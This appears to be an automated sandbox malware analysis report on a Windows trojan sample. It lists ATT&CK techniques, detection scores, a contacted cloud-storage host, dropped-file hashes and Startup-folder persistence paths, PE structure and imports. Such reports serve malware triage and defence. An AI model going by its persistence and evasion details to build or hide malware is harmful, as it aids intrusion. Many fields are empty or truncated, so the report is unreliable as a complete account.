Source: | Code function: | 0_2_00007FF6BB18D540 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 0_2_00007FF6BB15FD20 |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00007FF6BB19DC1C |
Source: | Code function: | 0_2_00007FF6BB182BCF |
Source: | Code function: | 0_2_00007FF6BB162400 |
Source: | Code function: | 0_2_00007FF6BB141D80 |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 0_2_00007FF6BB1B3940 | |
Source: | Code function: | 0_2_00007FF6BB1B4074 | |
Source: | Code function: | 3_2_005A696E | |
Source: | Code function: | 3_2_005A6E32 | |
Source: | Code function: | 10_2_0091696E | |
Source: | Code function: | 10_2_00916E32 |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 2 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 26 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 211 Masquerading | LSA Secrets | 31 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
42% | ReversingLabs | Win64.Trojan.Povertel | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | ReversingLabs | |||
3% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
my.cloudme.com | 83.140.241.4 | true | false | unknown | |
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
false |
| unknown | ||
false | unknown | |||
false | unknown | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
83.140.241.4 | my.cloudme.com | Sweden | 39369 | PORT80SE | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1528376 |
Start date and time: | 2024-10-07 21:29:06 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 8m 54s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | T6l6gPxwQU.exerenamed because original name is a hash value |
Original Sample Name: | fca042b18adf613d9a2be1646663698f.exe |
Detection: | MAL |
Classification: | mal100.expl.evad.winEXE@12/10@3/1 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7364 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report creation exceeded maximum time and may have missing disassembly code information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: T6l6gPxwQU.exe
Time | Type | Description |
---|---|---|
15:29:59 | API Interceptor | |
15:30:45 | API Interceptor | |
15:31:04 | API Interceptor | |
20:30:10 | Autostart |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
83.140.241.4 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
my.cloudme.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
PORT80SE | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Moobot | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | Outlook Phishing, HTMLPhisher | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Credential Flusher | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Remcos | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Vidar | Browse | |||
Get hash | malicious | Vidar | Browse | |||
Get hash | malicious | Vidar | Browse | |||
Get hash | malicious | Unknown | Browse | |||
C:\Users\Public\InformationCheck.exe | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Remcos | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Vidar | Browse | |||
Get hash | malicious | Vidar | Browse | |||
Get hash | malicious | Vidar | Browse | |||
Get hash | malicious | Unknown | Browse |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3485127 |
Entropy (8bit): | 4.739244309224887 |
Encrypted: | false |
SSDEEP: | 24576:qcb6NMAG7HuyDNNx+ZB8rKZsNuNxWdY74lb9UWrEiTO2yP:a |
MD5: | 3881B892AE0893A906D6CBE6DB39FE11 |
SHA1: | CF03508A1B930C37F5737227F917A6A36A6FD650 |
SHA-256: | 35287AC8E4E594323E7E7D77C697E8089E2D7B4D1D661F4E2B0E1884A78C3221 |
SHA-512: | F7C49C8302028ED05C03C6805A657B26F82AF8A856AC723FBED10DB04452609611815928FDF290D57A3D3D0FA5C45805D72D14F71424AAE83A38144941BFE681 |
Malicious: | true |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\T6l6gPxwQU.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 893608 |
Entropy (8bit): | 6.620131693023677 |
Encrypted: | false |
SSDEEP: | 12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01 |
MD5: | C56B5F0201A3B3DE53E561FE76912BFD |
SHA1: | 2A4062E10A5DE813F5688221DBEB3F3FF33EB417 |
SHA-256: | 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D |
SHA-512: | 195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Users\user\Desktop\T6l6gPxwQU.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 373 |
Entropy (8bit): | 5.122687847204781 |
Encrypted: | false |
SSDEEP: | 6:gsvPFyKoJFODu3Id25PaH9Ayz1gY1PaHzPMKds48QLh8JdWzH6mLF7djIXIINOQL:xv9ZoXOJrAymYEzdHGHWzH6mL5dsfHbf |
MD5: | 3E79D02E7B3EF1B1C347DBF4090CD366 |
SHA1: | 90F33D606D9E2C544F0E3C48FBF02B0080501275 |
SHA-256: | 3A54CC3C7B092F5FC5978A1A757D1FFC32C4539430433CE469662C980288137C |
SHA-512: | 8CC2F59F89414FA83246A5C7E3589C6038F23C83DE7A1EF3920AF1B57028B63C6105930675E9F99AFAC1F228712B27C2E2A8B0BC9D2DEC55EEB8C921C6D60740 |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulxmH/lZ:NllUg |
MD5: | D904BDD752B6F23D81E93ECA3BD8E0F3 |
SHA1: | 026D8B0D0F79861746760B0431AD46BAD2A01676 |
SHA-256: | B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2 |
SHA-512: | 5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\Public\InformationCheck.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3485124 |
Entropy (8bit): | 4.739228439290352 |
Encrypted: | false |
SSDEEP: | 24576:Dcb6NMAG7HuyDNNx+ZB8rKZsNuNxWdY74lb9UWrEiTO2yP:5 |
MD5: | F684D28C9ADBC8AA4A1CB8A64CB26FC5 |
SHA1: | 4CB15F81E6EE5D5BB7B51FB22EEE1A9D6CD44BC1 |
SHA-256: | DA2215F0068D4E839C7698C3576CF3288E84C351E7634E1A45969DB7078755E9 |
SHA-512: | EE11BF3FDE51A9A70174C10AC82CF9C834A8DA9C0003B4E5BAD6E7C65E02623F2C30CB1AE86A62C5409DDD0952946F189B16095E5DAF5E7E54388352E748786D |
Malicious: | false |
Preview: |
Process: | C:\Users\Public\InformationCheck.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 184 |
Entropy (8bit): | 4.736154105743425 |
Encrypted: | false |
SSDEEP: | 3:RiMIpGXfeNH5E5wWAX+Ro6p4EkD5yKXW/Zi+0/RaMl85uWAX+Ro6p4EkD5yKXW/f:RiJbNHCwWDKaJkDrXW/Zz0tl8wWDKaJX |
MD5: | 612D28A7A2758BAAF54DB34272446F87 |
SHA1: | D4671632FC2141EF2AB2455F8923BC5197B2FD68 |
SHA-256: | 94A83DD87CE7268703585A40C52491DDC7D332380B82832951DED047AAE6D73A |
SHA-512: | B4B64908C674F92F5D4B1E761E123957E8D5CD6C3F433D2D5C6ADD19101FD0610EE968222D4CED31E8F21F7F022D880E7E723E4171BC7DB18C37A2000A58565B |
Malicious: | true |
Preview: |
Process: | C:\Users\Public\InformationCheck.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 893608 |
Entropy (8bit): | 6.620131693023677 |
Encrypted: | false |
SSDEEP: | 12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01 |
MD5: | C56B5F0201A3B3DE53E561FE76912BFD |
SHA1: | 2A4062E10A5DE813F5688221DBEB3F3FF33EB417 |
SHA-256: | 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D |
SHA-512: | 195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Download File
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98 |
Entropy (8bit): | 4.915531212533357 |
Encrypted: | false |
SSDEEP: | 3:HRAbABGQaFyw3pYot+kiE2J5yKXW/Zi+URAAy:HRYF5yjowkn23yKXW/Zzyy |
MD5: | 56D029782506F3E1F7EC40780D1DA27F |
SHA1: | C7E0690DE9B31C951AC212A7E940E460267F2BA1 |
SHA-256: | 5F412A72A3459ACA6A245DE1A280AB53CA5E6B306FECA32E0DF4B0B9B7863223 |
SHA-512: | 1C5F108FB4325E4B47E9EE15F5D828569EE90676D5170D6D3B92BD13BD39CCAA68657CBB97761007154C73D2FFCFA8A3582879CB2097A899B22C1C83848A9D92 |
Malicious: | true |
Preview: |
File type: | |
Entropy (8bit): | 7.310400449094374 |
TrID: |
|
File name: | T6l6gPxwQU.exe |
File size: | 1'974'272 bytes |
MD5: | fca042b18adf613d9a2be1646663698f |
SHA1: | a7c91cd17ceeb8b1d0ac9873723f2b35487ca50c |
SHA256: | 3e358ac78679758f3720dd60d4e5fdff8323f2de436add34238d39c9bf969460 |
SHA512: | 5109cb5cb9606c330110eee1449506abf7453d795c656b232ea12968ee481a3df698ba9a3dcc1a8c122eaa198e0b27677ab25fc4fd5e4e8909a6019b40820bdc |
SSDEEP: | 49152:x2EYTb8atv1orq+pEiSDTj1VyvBatZeI4LeO07B+Iy3AqMl1ZcK:gXbIrq3o/07B+yqm1Z |
TLSH: | EB95C01973A4419DFEABE1B6CA13C607D7B17C460277861F02A46B766F337712A2E321 |
File Content Preview: | MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG |
Icon Hash: | 13ebebe37b0db4f9 |
Entrypoint: | 0x14002549c |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x140000000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE |
DLL Characteristics: | HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x66FC4D92 [Tue Oct 1 19:29:22 2024 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 2 |
File Version Major: | 5 |
File Version Minor: | 2 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 2 |
Import Hash: | fadc5a257419d2541a6b13dfb5e311e2 |
Instruction |
---|
dec eax |
sub esp, 28h |
call 00007F8C24834730h |
dec eax |
add esp, 28h |
jmp 00007F8C2483403Fh |
int3 |
int3 |
inc eax |
push ebx |
dec eax |
sub esp, 20h |
dec eax |
mov ebx, ecx |
dec eax |
mov eax, edx |
dec eax |
lea ecx, dword ptr [0009466Dh] |
dec eax |
mov dword ptr [ebx], ecx |
dec eax |
lea edx, dword ptr [ebx+08h] |
xor ecx, ecx |
dec eax |
mov dword ptr [edx], ecx |
dec eax |
mov dword ptr [edx+08h], ecx |
dec eax |
lea ecx, dword ptr [eax+08h] |
call 00007F8C24835C49h |
dec eax |
lea eax, dword ptr [0009467Dh] |
dec eax |
mov dword ptr [ebx], eax |
dec eax |
mov eax, ebx |
dec eax |
add esp, 20h |
pop ebx |
ret |
int3 |
dec eax |
and dword ptr [ecx+10h], 00000000h |
dec eax |
lea eax, dword ptr [00094674h] |
dec eax |
mov dword ptr [ecx+08h], eax |
dec eax |
lea eax, dword ptr [00094659h] |
dec eax |
mov dword ptr [ecx], eax |
dec eax |
mov eax, ecx |
ret |
int3 |
int3 |
inc eax |
push ebx |
dec eax |
sub esp, 20h |
dec eax |
mov ebx, ecx |
dec eax |
mov eax, edx |
dec eax |
lea ecx, dword ptr [0009460Dh] |
dec eax |
mov dword ptr [ebx], ecx |
dec eax |
lea edx, dword ptr [ebx+08h] |
xor ecx, ecx |
dec eax |
mov dword ptr [edx], ecx |
dec eax |
mov dword ptr [edx+08h], ecx |
dec eax |
lea ecx, dword ptr [eax+08h] |
call 00007F8C24835BE9h |
dec eax |
lea eax, dword ptr [00094645h] |
dec eax |
mov dword ptr [ebx], eax |
dec eax |
mov eax, ebx |
dec eax |
add esp, 20h |
pop ebx |
ret |
int3 |
dec eax |
and dword ptr [ecx+10h], 00000000h |
dec eax |
lea eax, dword ptr [0009463Ch] |
dec eax |
mov dword ptr [ecx+08h], eax |
dec eax |
lea eax, dword ptr [00000021h] |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe5c10 | 0x17c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfb000 | 0xed7cc | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xf4000 | 0x6f48 | .pdata |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1e9000 | 0xa74 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc7050 | 0x1c | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0xd9aa0 | 0x28 | .rdata |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xc7070 | 0x100 | .rdata |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb5000 | 0x1138 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb3328 | 0xb3400 | 507a8505198e35cc9675301d53e3b1c4 | False | 0.5503358721234309 | data | 6.5212967575920215 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0xb5000 | 0x34204 | 0x34400 | 9eda36be0cf076085a2f9772c1ee5803 | False | 0.30884139503588515 | data | 5.360588077813426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xea000 | 0x9120 | 0x5000 | ec6b77d6ef8898b0d3b7d48c042d66a0 | False | 0.040673828125 | DOS executable (block device driver) | 0.5749243362866429 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.pdata | 0xf4000 | 0x6f48 | 0x7000 | 4416e27f8be9f9271c439d2fd34d1b2d | False | 0.49612862723214285 | data | 5.911479421450324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.rsrc | 0xfb000 | 0xed7cc | 0xed800 | bec808d7dc177cca1390dc1ada2ac9e2 | False | 0.9320888157894737 | data | 7.852477011959672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x1e9000 | 0xa74 | 0xc00 | 5ddb0e422ace102fe530e589a0cbec6f | False | 0.4850260416666667 | data | 5.139847116863034 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0xfb518 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
RT_ICON | 0xfb640 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
RT_ICON | 0xfb768 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
RT_ICON | 0xfb890 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | Great Britain | 0.6071763602251408 |
RT_ICON | 0xfc938 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | Great Britain | 0.525103734439834 |
RT_ICON | 0xfeee0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | Great Britain | 0.47821209258384506 |
RT_ICON | 0x103108 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | Great Britain | 0.36631964982846327 |
RT_ICON | 0x113930 | 0xc34e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9994999799991999 |
RT_MENU | 0x11fc80 | 0x50 | data | English | Great Britain | 0.9 |
RT_STRING | 0x11fcd0 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
RT_STRING | 0x120264 | 0x68a | data | English | Great Britain | 0.2735961768219833 |
RT_STRING | 0x1208f0 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
RT_STRING | 0x120d80 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
RT_STRING | 0x12137c | 0x65c | data | English | Great Britain | 0.34336609336609336 |
RT_STRING | 0x1219d8 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
RT_STRING | 0x121e40 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
RT_RCDATA | 0x121f98 | 0xc62e0 | data | 1.00031537036307 | ||
RT_GROUP_ICON | 0x1e8278 | 0x4c | data | English | Great Britain | 0.8157894736842105 |
RT_GROUP_ICON | 0x1e82c4 | 0x14 | data | English | Great Britain | 1.25 |
RT_GROUP_ICON | 0x1e82d8 | 0x14 | data | English | Great Britain | 1.15 |
RT_GROUP_ICON | 0x1e82ec | 0x14 | data | English | Great Britain | 1.25 |
RT_VERSION | 0x1e8300 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
RT_MANIFEST | 0x1e83dc | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
DLL | Import |
---|---|
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect |
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW |
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W |
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable |
PSAPI.DLL | GetProcessMemoryInfo |
